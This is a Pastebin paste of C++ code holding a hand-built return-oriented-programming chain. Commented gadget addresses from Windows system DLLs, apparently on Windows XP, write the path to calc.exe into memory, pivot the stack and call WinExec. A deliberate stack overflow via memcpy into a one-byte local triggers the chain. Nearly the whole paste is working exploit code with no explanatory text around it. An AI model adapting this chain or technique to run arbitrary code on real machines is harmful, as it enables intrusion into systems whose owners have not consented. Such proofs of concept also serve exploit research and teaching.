Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <iostream>
- #include "windows.h"
- char shellcode[]=
- "\xb1\x4f\x97\x7c" // POP ECX # RETN
- "\xf9\x10\x47\x7e" // Writable PTR USER32.dll
- "\x27\xfa\x87\x7c" // POP EDX # POP EAX # RETN
- "\x43\x3a\x5c\x57" // ASCII "C:\W"
- "\x49\x4e\x44\x4f" // ASCII "INDO"
- "\x04\x18\x80\x7c" // MOV DWORD PTR DS:[ECX],EDX # MOV DWORD PTR DS:[ECX+4],EAX # POP EBP # RETN 04
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\xe5\x02\x88\x7c" // POP EAX # RETN
- "\x57\x53\x5c\x73" // ASCII "WS\s"
- "\x38\xd6\x46\x7e" // MOV DWORD PTR DS:[ECX+8],EAX # POP ESI # POP EBP # RETN 08
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\xe5\x02\x88\x7c" // POP EAX # RETN
- "\x79\x73\x74\x65" // ASCII "yste"
- "\xcb\xbe\x45\x7e" // MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\xe5\x02\x88\x7c" // POP EAX # RETN
- "\x63\x61\x6c\x63" // ASCII "calc"
- "\x31\xa9\x91\x7c" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x07\x3d\x96\x7c" // INC ECX # RETN
- "\x07\x3d\x96\x7c" // INC ECX # RETN
- "\x07\x3d\x96\x7c" // INC ECX # RETN
- "\x07\x3d\x96\x7c" // INC ECX # RETN
- "\xe5\x02\x88\x7c" // POP EAX # RETN
- "\x6d\x33\x32\x5c" // ASCII "m32\"
- "\xcb\xbe\x45\x7e" // MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\xe5\x02\x88\x7c" // POP EAX # RETN
- "\x2e\x65\x78\x65" // ASCII ".exe"
- "\x31\xa9\x91\x7c" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x07\x3d\x96\x7c" // INC ECX # RETN
- "\x07\x3d\x96\x7c" // INC ECX # RETN
- "\x07\x3d\x96\x7c" // INC ECX # RETN
- "\x07\x3d\x96\x7c" // INC ECX # RETN
- "\x9e\x2e\x92\x7c" // XOR EAX,EAX # RETN
- "\x31\xa9\x91\x7c" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\xee\x4c\x97\x7c" // DEC ECX # RETN
- "\xee\x4c\x97\x7c" // DEC ECX # RETN
- "\xee\x4c\x97\x7c" // DEC ECX # RETN
- "\xee\x4c\x97\x7c" // DEC ECX # RETN
- "\xee\x4c\x97\x7c" // DEC ECX # RETN
- "\xee\x4c\x97\x7c" // DEC ECX # RETN
- "\xee\x4c\x97\x7c" // DEC ECX # RETN
- "\xee\x4c\x97\x7c" // DEC ECX # RETN
- //-------------------------------------------["C:\WINDOWS\system32\calc.exe+00000000" -> ecx]-//
- "\xe5\x02\x88\x7c" // POP EAX # RETN
- "\x7a\xeb\xc3\x6f" // Should result in a valid PTR in kernel32.dll
- "\x4f\xda\x85\x7c" // PUSH ESP # ADC BYTE PTR DS:[EAX+CC4837C],AL # XOR EAX,EAX # INC EAX # POP EDI # POP EBP # RETN 08
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x32\xd9\x44\x7e" // XCHG EAX,EDI # RETN
- "\x62\x28\x97\x7c" // ADD EAX,20 # POP EBP # RETN
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x62\x28\x97\x7c" // ADD EAX,20 # POP EBP # RETN
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x62\x28\x97\x7c" // ADD EAX,20 # POP EBP # RETN
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x62\x28\x97\x7c" // ADD EAX,20 # POP EBP # RETN
- "\x8a\x20\x87\x7c" // Compensate POP
- //-----------------------------------------------------------[Save Stack Pointer + pivot eax]-//
- "\xd6\xd1\x95\x7c" // MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x33\x80\x97\x7c" // INC EAX # RETN
- "\x33\x80\x97\x7c" // INC EAX # RETN
- "\x33\x80\x97\x7c" // INC EAX # RETN
- "\x33\x80\x97\x7c" // INC EAX # RETN
- "\xf5\xd6\x91\x7c" // XOR ECX,ECX # RETN
- "\x07\x3d\x96\x7c" // INC ECX # RETN
- "\xd6\xd1\x95\x7c" // MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\xb1\x4f\x97\x7c" // POP ECX # RETN
- "\xed\x2a\x86\x7c" // WinExec()
- "\xe7\xc1\x87\x7c" // MOV DWORD PTR DS:[EAX+4],ECX # XOR EAX,EAX # POP EBP # RETN 04
- "\x8a\x20\x87\x7c" // Compensate POP
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Compensate RETN
- "\x8a\x20\x87\x7c" // Final RETN for WinExec()
- "\x8a\x20\x87\x7c"; // Compensate WinExec()
- //------------------------------------------------------[Write Arguments and execute -> calc]-//
- void buff() {
- char a;
- memcpy((&a)+5, shellcode, sizeof(shellcode)); // Compiler dependent, works with Dev-C++ 4.9
- }
- int main()
- {
- LoadLibrary("USER32.dll"); // we need this dll
- char buf[1024];
- buff();
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
